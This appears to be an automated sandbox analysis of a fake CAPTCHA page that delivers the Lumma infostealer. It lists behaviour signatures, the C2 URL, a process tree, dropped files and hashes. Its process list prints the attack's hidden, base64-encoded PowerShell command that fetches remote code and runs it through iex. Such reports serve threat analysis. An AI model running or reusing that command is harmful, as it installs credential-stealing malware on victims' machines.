Analysis

  • max time kernel
    113s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 20:18

General

  • Target

    https://captcha-recognition-v2.b-cdn.net/verify.html

Malware Config

Extracted

Family

lumma

C2

https://candidatersz.cyou/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://captcha-recognition-v2.b-cdn.net/verify.html
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3016
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbd38d46f8,0x7ffbd38d4708,0x7ffbd38d4718
      2⤵
        PID:700
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,15839410434133891073,1892591764192323912,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
        2⤵
          PID:3476
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,15839410434133891073,1892591764192323912,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:228
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,15839410434133891073,1892591764192323912,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
          2⤵
            PID:4824
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15839410434133891073,1892591764192323912,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
            2⤵
              PID:2860
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15839410434133891073,1892591764192323912,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
              2⤵
                PID:2856
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,15839410434133891073,1892591764192323912,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4976 /prefetch:8
                2⤵
                  PID:656
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,15839410434133891073,1892591764192323912,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4976 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1000
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15839410434133891073,1892591764192323912,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
                  2⤵
                    PID:5376
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15839410434133891073,1892591764192323912,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
                    2⤵
                      PID:5388
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15839410434133891073,1892591764192323912,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                      2⤵
                        PID:5576
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15839410434133891073,1892591764192323912,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
                        2⤵
                          PID:5584
                      • C:\Windows\System32\CompPkgSrv.exe
                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                        1⤵
                          PID:4160
                        • C:\Windows\System32\CompPkgSrv.exe
                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                          1⤵
                            PID:2244
                          • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                            "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W hiDDEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vZ2V0ZmlsZTQ1NjguYi1jZG4ubmV0L1RVa2FHTHhYLnR4dCcgLVVzZUJhc2ljUGFyc2luZykuQ29udGVudA==')) | iex"
                            1⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Adds Run key to start application
                            • Drops file in System32 directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1844
                            • C:\Users\Admin\AppData\Roaming\nxbNSawb\Set-up.exe
                              "C:\Users\Admin\AppData\Roaming\nxbNSawb\Set-up.exe"
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:4324
                              • C:\Windows\SysWOW64\more.com
                                C:\Windows\SysWOW64\more.com
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                PID:724
                                • C:\Windows\SysWOW64\msiexec.exe
                                  C:\Windows\SysWOW64\msiexec.exe
                                  4⤵
                                  • Blocklisted process makes network request
                                  • System Location Discovery: System Language Discovery
                                  PID:5012

                          Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                            Filesize

                            152B

                            MD5

                            0a9dc42e4013fc47438e96d24beb8eff

                            SHA1

                            806ab26d7eae031a58484188a7eb1adab06457fc

                            SHA256

                            58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151

                            SHA512

                            868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                            Filesize

                            152B

                            MD5

                            61cef8e38cd95bf003f5fdd1dc37dae1

                            SHA1

                            11f2f79ecb349344c143eea9a0fed41891a3467f

                            SHA256

                            ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e

                            SHA512

                            6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\5b2edd50-9791-491d-ab5b-488fed3ed172.tmp

                            Filesize

                            6KB

                            MD5

                            3f004bc96388f99cd43bbf7847cb68d5

                            SHA1

                            6214250abda71da52a8ae2f3a22af8bacd7bd349

                            SHA256

                            2a275fb2b10110e4ca362b2d7fdd126e297ba771245a5d2030d8e22d36be5251

                            SHA512

                            ce03825235ece474bd7b27504081952ad5fe14bd2c2add2a50e8bcead478c97d5f6907f9c36b00d0365e8c7b4fea65370526318f5b8fd0fdf6b0d7751555378e

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                            Filesize

                            472B

                            MD5

                            4f2a3f402d6da32e135ee5a4a033da9d

                            SHA1

                            aa3922ad6283398ebbb3466a308e06af6a7bc902

                            SHA256

                            f4b61fe714f949e58d5b796e7e9fba9882faf6348bdebf17618454434630a894

                            SHA512

                            bc264d18421182077c1593efff6f879ef30d9ad4215b072fed9f1899610b4af2139c6c21d40da5c2e8331fcfc9a7d601ebfe90015d0b1b60f492f5f009d2464a

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                            Filesize

                            5KB

                            MD5

                            12d9a9a11d430e8ec35ee10bfd55b3b5

                            SHA1

                            fc2966c4afeec1e63a448e695ad9fb0b225132d2

                            SHA256

                            e4b69a310ad974dbf8f77f390943749a513b26776bdf1af5bde0a909fb7709e9

                            SHA512

                            715d4d5e4bdb461e999e037366ca425a4821392586fcf626a4179cf55622d01cb194a899d7df36dfd35182a3085c429c42055d43e84c95310e9733c1dfa6a855

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                            Filesize

                            16B

                            MD5

                            46295cac801e5d4857d09837238a6394

                            SHA1

                            44e0fa1b517dbf802b18faf0785eeea6ac51594b

                            SHA256

                            0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                            SHA512

                            8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                            Filesize

                            16B

                            MD5

                            206702161f94c5cd39fadd03f4014d98

                            SHA1

                            bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                            SHA256

                            1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                            SHA512

                            0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                            Filesize

                            11KB

                            MD5

                            f6de21f1343fc8f6ab78ab9b7e15561d

                            SHA1

                            8883a0e4354496389b398712f966e8984d91cd5b

                            SHA256

                            4fbe18729c262450c5cd7984af6e85be435682b3c61f1d227a040028b14c83c5

                            SHA512

                            5fc7fccc14b9c834dbb2ddf1bfbc413d1efba2ef33cdfd6dfdcfa22eb50b00f3eda803858ac6915792b8be4c1affcd67e9d78f972362b55c936e8e01fae3d398

                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                            Filesize

                            10KB

                            MD5

                            7c45945eb14cd3c30869302f89725537

                            SHA1

                            367db673cc6a488cb72b637f9bb155fd115df863

                            SHA256

                            9f0f263ce974db582a487087ef9d67a02e3434198e374829b25e8ea36ceaa2a8

                            SHA512

                            f00f63832505dba6dd2e816d7efd97e2a9c3bb20a28a3a2e2a28cfaa4ff0091b9a5d684eaf7bf6db8d39d68a200f65cecb3d968b9dd1797f3ec257e42f2b5624

                          • C:\Users\Admin\AppData\Local\Temp\2b7c09a4

                            Filesize

                            1.0MB

                            MD5

                            35110fbf2461b7b2ee65f8de92c46a03

                            SHA1

                            c89fe3d61cf20764f1d2399555223985e11c2edf

                            SHA256

                            db65edab4033e0c16f7fe414d90e412a207baf23640319ae3bd9d32775e58806

                            SHA512

                            b90235800dc26be16d23f8f25861431ea6edd510de8d9304f1e9ec2d47795be0ee529aa6c16c0a8c5ce9f9fda16120d8bcf7f5950bc8871cd6590ddae2435d61

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vxxa3axy.fbi.ps1

                            Filesize

                            60B

                            MD5

                            d17fe0a3f47be24a6453e9ef58c94641

                            SHA1

                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                            SHA256

                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                            SHA512

                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                          • C:\Users\Admin\AppData\Roaming\nxbNSawb\MSVCP100.dll

                            Filesize

                            411KB

                            MD5

                            03e9314004f504a14a61c3d364b62f66

                            SHA1

                            0aa3caac24fdf9d9d4c618e2bbf0a063036cd55d

                            SHA256

                            a3ba6421991241bea9c8334b62c3088f8f131ab906c3cc52113945d05016a35f

                            SHA512

                            2fcff4439d2759d93c57d49b24f28ae89b7698e284e76ac65fe2b50bdefc23a8cc3c83891d671de4e4c0f036cef810856de79ac2b028aa89a895bf35abff8c8d

                          • C:\Users\Admin\AppData\Roaming\nxbNSawb\QtCore4.dll

                            Filesize

                            2.5MB

                            MD5

                            fecc62a37d37d9759e6b02041728aa23

                            SHA1

                            0c5f646caef7a6e9073d58ed698f6cfbfb2883a3

                            SHA256

                            94c1395153d7758900979351e633ab68d22ae9b306ef8e253b712a1aab54c805

                            SHA512

                            698f90f1248dacbd4bdc49045a4e80972783d9dcec120d187abd08f5ef03224b511f7870320938b7e8be049c243ffb1c450c847429434ef2e2c09288cb9286a6

                          • C:\Users\Admin\AppData\Roaming\nxbNSawb\QtGui4.dll

                            Filesize

                            8.2MB

                            MD5

                            831ba3a8c9d9916bdf82e07a3e8338cc

                            SHA1

                            6c89fd258937427d14d5042736fdfccd0049f042

                            SHA256

                            d2c8c8b6cc783e4c00a5ef3365457d776dfc1205a346b676915e39d434f5a52d

                            SHA512

                            beda57851e0e3781ece1d0ee53a3f86c52ba99cb045943227b6c8fc1848a452269f2768bf4c661e27ddfbe436df82cfd1de54706d814f81797a13fefec4602c5

                          • C:\Users\Admin\AppData\Roaming\nxbNSawb\QtNetwork4.dll

                            Filesize

                            1.0MB

                            MD5

                            8a2e025fd3ddd56c8e4f63416e46e2ec

                            SHA1

                            5f58feb11e84aa41d5548f5a30fc758221e9dd64

                            SHA256

                            52ae07d1d6a467283055a3512d655b6a43a42767024e57279784701206d97003

                            SHA512

                            8e3a449163e775dc000e9674bca81ffabc7fecd9278da5a40659620cfc9cc07f50cc29341e74176fe10717b2a12ea3d5148d1ffc906bc809b1cd5c8c59de7ba1

                          • C:\Users\Admin\AppData\Roaming\nxbNSawb\QtXml4.dll

                            Filesize

                            348KB

                            MD5

                            e9a9411d6f4c71095c996a406c56129d

                            SHA1

                            80b6eefc488a1bf983919b440a83d3c02f0319dd

                            SHA256

                            c9b2a31bfe75d1b25efcc44e1df773ab62d6d5c85ec5d0bc2dfe64129f8eab5e

                            SHA512

                            93bb3dd16de56e8bed5ac8da125681391c4e22f4941c538819ad4849913041f2e9bb807eb5570ee13da167cfecd7a08d16ad133c244eb6d25f596073626ce8a2

                          • C:\Users\Admin\AppData\Roaming\nxbNSawb\Set-up.exe

                            Filesize

                            6.2MB

                            MD5

                            11c8962675b6d535c018a63be0821e4c

                            SHA1

                            a150fa871e10919a1d626ffe37b1a400142f452b

                            SHA256

                            421e36788bfcb4433178c657d49aa711446b3a783f7697a4d7d402a503c1f273

                            SHA512

                            3973c23fc652e82f2415ff81f2756b55e46c6807cc4a8c37e5e31009cec45ab47c5d4228c03b5e3a972cacd6547cf0d3273965f263b1b2d608af89f5be6e459a

                          • C:\Users\Admin\AppData\Roaming\nxbNSawb\StarBurn.dll

                            Filesize

                            648KB

                            MD5

                            bbf0b66f271322a7c5701d5488d6a6dd

                            SHA1

                            d4978e0cfcb374066bdaefea2aacf0417830ed95

                            SHA256

                            39f8082f72067be64270647f899919582438a0c7461c439174767b139406abd8

                            SHA512

                            a98c6bbb312ecb1ba30dacb39c755de7f48ee105bb014f51f3096b225ef6a0f73258d7f142965ec94a8f4dbf8da4d0cef4e6e3b85d17201236fa7a02555cb532

                          • C:\Users\Admin\AppData\Roaming\nxbNSawb\msvcr100.dll

                            Filesize

                            752KB

                            MD5

                            67ec459e42d3081dd8fd34356f7cafc1

                            SHA1

                            1738050616169d5b17b5adac3ff0370b8c642734

                            SHA256

                            1221a09484964a6f38af5e34ee292b9afefccb3dc6e55435fd3aaf7c235d9067

                            SHA512

                            9ed1c106df217e0b4e4fbd1f4275486ceba1d8a225d6c7e47b854b0b5e6158135b81be926f51db0ad5c624f9bd1d09282332cf064680dc9f7d287073b9686d33

                          • C:\Users\Admin\AppData\Roaming\nxbNSawb\nmprwjs

                            Filesize

                            787KB

                            MD5

                            7ab8ef9419f402c83e0cd0346d9a1a67

                            SHA1

                            caa661be7346c474de569b19b09507c58a6f7d10

                            SHA256

                            4ec0eef7ce80b0181dbf5d946c7a2d40067b9bf89292b27f7496482e2f7a80a1

                            SHA512

                            aacd71428a25abb693b5e3773c94b595d659ace9894448e733809ecfacd3e1f066b1ae4bc8d477c8b112fcff44fd7f3a20e0a1fd39c8d7a7d199ce330c971c9d

                          • C:\Users\Admin\AppData\Roaming\nxbNSawb\ovaw

                            Filesize

                            23KB

                            MD5

                            90284f3d3121827201d9233a4d7cd97d

                            SHA1

                            0dff5c2b5aa628d7800b6fb163f7be7948229af5

                            SHA256

                            2c373d4495aa2e52a9f27039998bb42f3a5139929ec8d8e8963c30d3f558cc57

                            SHA512

                            dcd9c837f38970d1dd5336732ed42fa2524791c23e6410018e9e149fbd6ee584101b951f851418ca522e571a775e34ee4f45786dddb33340fc67ef1bd1c4db64

                          • \??\pipe\LOCAL\crashpad_3016_XJKMOYDMRPQMNSLE

                            MD5

                            d41d8cd98f00b204e9800998ecf8427e

                            SHA1

                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                            SHA256

                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                            SHA512

                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                          • memory/724-270-0x00000000740C0000-0x000000007423B000-memory.dmp

                            Filesize

                            1.5MB

                          • memory/724-269-0x00007FFBE22F0000-0x00007FFBE24E5000-memory.dmp

                            Filesize

                            2.0MB

                          • memory/1844-138-0x000001C049A30000-0x000001C049A42000-memory.dmp

                            Filesize

                            72KB

                          • memory/1844-77-0x000001C063750000-0x000001C063772000-memory.dmp

                            Filesize

                            136KB

                          • memory/1844-139-0x000001C049A10000-0x000001C049A1A000-memory.dmp

                            Filesize

                            40KB

                          • memory/4324-266-0x00000000740C0000-0x000000007423B000-memory.dmp

                            Filesize

                            1.5MB

                          • memory/4324-247-0x00007FFBE22F0000-0x00007FFBE24E5000-memory.dmp

                            Filesize

                            2.0MB

                          • memory/4324-246-0x00000000740C0000-0x000000007423B000-memory.dmp

                            Filesize

                            1.5MB

                          • memory/5012-274-0x00007FFBE22F0000-0x00007FFBE24E5000-memory.dmp

                            Filesize

                            2.0MB

                          • memory/5012-275-0x0000000000750000-0x00000000007AD000-memory.dmp

                            Filesize

                            372KB

                          • memory/5012-276-0x0000000000160000-0x0000000000172000-memory.dmp

                            Filesize

                            72KB